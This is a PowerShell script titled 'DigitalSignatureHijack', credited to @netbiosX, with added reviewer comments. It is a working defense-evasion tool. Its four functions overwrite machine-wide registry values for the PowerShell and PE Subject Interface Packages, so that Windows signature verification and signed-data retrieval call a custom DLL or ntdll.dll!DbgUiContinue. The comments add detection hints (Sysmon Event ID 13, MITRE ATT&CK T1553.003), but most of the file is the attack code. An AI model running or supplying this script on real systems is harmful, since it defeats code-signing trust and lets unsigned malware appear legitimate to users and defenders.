<#
DigitalSignatureHijack v1.0
License: GPLv3
Author: @netbiosX
#>
# Redirects (does not perform) digital-signature hash validation for PowerShell
# scripts: rewrites the CryptSIPDllVerifyIndirectData registration of the
# PowerShell SIP so that the Dll/FuncName pair names a different export.
#
# Parameters: none. Output: none (Set-ItemProperty is called without -PassThru).
# Side effect: two registry value writes under HKLM, i.e. machine-wide; writing
# to this key normally requires administrative rights.
# The previous Dll/FuncName values are not read or saved, so this script offers
# no way to restore the original registration.
#
# NOTE(review): for detection, watch registry value-set events (e.g. Sysmon
# Event ID 13) on Dll/FuncName under ...\OID\EncodingType 0\CryptSIPDll*, and
# diff these values against a clean host of the same OS build. This technique
# is tracked as MITRE ATT&CK T1553.003 (SIP and Trust Provider Hijacking).
function ValidateSignaturePS
{
# Registry key holding, per SIP GUID, the DLL export used to verify a file's hash.
$ValidateHashFunc = 'HKLM:\SOFTWARE\Microsoft\Cryptography' +'\OID\EncodingType 0\CryptSIPDllVerifyIndirectData'
# PowerShell SIP Guid
$PSIPGuid = '{603BCC1F-4B59-4E08-B724-D2C6297EF351}'
# Get-Item's result is not checked before it is piped to the writes below.
$PSSignatureValidation = Get-Item -Path "$ValidateHashFunc\$PSIPGuid\"
# Hard-coded replacement DLL inside a user profile.
# NOTE(review): MySIP.dll and its AutoApproveHash export are not on this page, so
# their behaviour cannot be confirmed here. A Dll value that points outside the
# system directories is itself an anomaly worth alerting on.
$NewDll = 'C:\Users\User\Desktop\Signature Signing\Binaries\MySIP.dll'
$NewFuncName = 'AutoApproveHash'
# Overwrite the registered DLL path, then the export name, for this SIP.
$PSSignatureValidation | Set-ItemProperty -Name Dll -Value $NewDll
$PSSignatureValidation | Set-ItemProperty -Name FuncName -Value $NewFuncName
}
# Redirects (does not perform) digital-signature hash validation for Portable
# Executables: rewrites the CryptSIPDllVerifyIndirectData registration of the
# PE SIP so that the Dll/FuncName pair names ntdll.dll!DbgUiContinue.
#
# Parameters: none. Output: none (Set-ItemProperty is called without -PassThru).
# Side effect: two registry value writes under HKLM, i.e. machine-wide; writing
# to this key normally requires administrative rights.
# The previous Dll/FuncName values are not read or saved, so restoring the
# registration needs a known-good baseline from elsewhere.
#
# NOTE(review): for detection, a FuncName under CryptSIPDllVerifyIndirectData
# that names an export unrelated to signature verification is a strong
# tampering indicator even though the Dll is a legitimate system file. Alert on
# value-set events for this key (e.g. Sysmon Event ID 13); MITRE ATT&CK T1553.003.
function ValidateSignaturePE
{
# Registry key holding, per SIP GUID, the DLL export used to verify a file's hash.
$ValidateHashFunc = 'HKLM:\SOFTWARE\Microsoft\Cryptography' +'\OID\EncodingType 0\CryptSIPDllVerifyIndirectData'
# PE SIP Guid
$PESIPGuid = '{C689AAB8-8E78-11D0-8C47-00C04FC295EE}'
# Get-Item's result is not checked before it is piped to the writes below.
$PESignatureValidation = Get-Item -Path "$ValidateHashFunc\$PESIPGuid\"
# Replacement target is an existing system DLL rather than a dropped file, so
# checks that only look for unknown DLL paths would not flag this value.
# NOTE(review): presumably the export is used as a stand-in that makes
# verification report success without checking the hash - confirm on a test host.
$NewDll = 'C:\Windows\System32\ntdll.dll'
$NewFuncName = 'DbgUiContinue'
# Overwrite the registered DLL path, then the export name, for this SIP.
$PESignatureValidation | Set-ItemProperty -Name Dll -Value $NewDll
$PESignatureValidation | Set-ItemProperty -Name FuncName -Value $NewFuncName
}
# Rewrites the CryptSIPDllGetSignedDataMsg registration of the PowerShell SIP so
# that the Dll/FuncName pair names MySIP.dll!GetLegitMSSignature. Despite the
# name, nothing is signed here; only the registry registration is changed.
#
# Parameters: none. Output: none (Set-ItemProperty is called without -PassThru).
# Side effect: two registry value writes under HKLM, i.e. machine-wide; writing
# to this key normally requires administrative rights.
# The previous Dll/FuncName values are not read or saved.
#
# NOTE(review): for detection, alert on value-set events (e.g. Sysmon Event
# ID 13) for Dll/FuncName under ...\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg
# and compare them with a clean baseline; MITRE ATT&CK T1553.003.
function SignPS
{
# Registry key holding, per SIP GUID, the DLL export that returns a file's signed data.
$GetCertFunc = 'HKLM:\SOFTWARE\Microsoft\Cryptography' +'\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg'
# PowerShell SIP Guid
$PSIPGuid = '{603BCC1F-4B59-4E08-B724-D2C6297EF351}'
# The variable is named PE... but holds the PowerShell SIP key (the GUID above).
# Get-Item's result is not checked before it is piped to the writes below.
$PEGetMSCert = Get-Item -Path "$GetCertFunc\$PSIPGuid\"
# Hard-coded replacement DLL inside a user profile.
# NOTE(review): MySIP.dll and its GetLegitMSSignature export are not on this
# page; presumably the export supplies signature data taken from another file -
# confirm. A Dll value outside the system directories is itself an anomaly.
$NewDll = 'C:\Users\User\Desktop\Signature Signing\Binaries\MySIP.dll'
$NewFuncName = 'GetLegitMSSignature'
# Overwrite the registered DLL path, then the export name, for this SIP.
$PEGetMSCert | Set-ItemProperty -Name Dll -Value $NewDll
$PEGetMSCert | Set-ItemProperty -Name FuncName -Value $NewFuncName
}
# Rewrites the CryptSIPDllGetSignedDataMsg registration of the PE SIP so that
# the Dll/FuncName pair names MySIP.dll!GetLegitMSSignature. Despite the name,
# nothing is signed here; only the registry registration is changed.
#
# Parameters: none. Output: none (Set-ItemProperty is called without -PassThru).
# Side effect: two registry value writes under HKLM, i.e. machine-wide; writing
# to this key normally requires administrative rights.
# The previous Dll/FuncName values are not read or saved.
#
# NOTE(review): for detection, alert on value-set events (e.g. Sysmon Event
# ID 13) for Dll/FuncName under ...\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg
# and compare them with a clean baseline; MITRE ATT&CK T1553.003. While this
# registration is altered, signature information shown for PE files on the
# host should not be relied on for triage.
function SignExe
{
# Registry key holding, per SIP GUID, the DLL export that returns a file's signed data.
$GetCertFunc = 'HKLM:\SOFTWARE\Microsoft\Cryptography' +'\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg'
# PE SIP Guid
$PESIPGuid = '{C689AAB8-8E78-11D0-8C47-00C04FC295EE}'
# Get-Item's result is not checked before it is piped to the writes below.
$PEGetMSCert = Get-Item -Path "$GetCertFunc\$PESIPGuid\"
# Hard-coded replacement DLL inside a user profile.
# NOTE(review): MySIP.dll and its GetLegitMSSignature export are not on this
# page; presumably the export supplies signature data taken from another file -
# confirm. A Dll value outside the system directories is itself an anomaly.
$NewDll = 'C:\Users\User\Desktop\Signature Signing\Binaries\MySIP.dll'
$NewFuncName = 'GetLegitMSSignature'
# Overwrite the registered DLL path, then the export name, for this SIP.
$PEGetMSCert | Set-ItemProperty -Name Dll -Value $NewDll
$PEGetMSCert | Set-ItemProperty -Name FuncName -Value $NewFuncName
}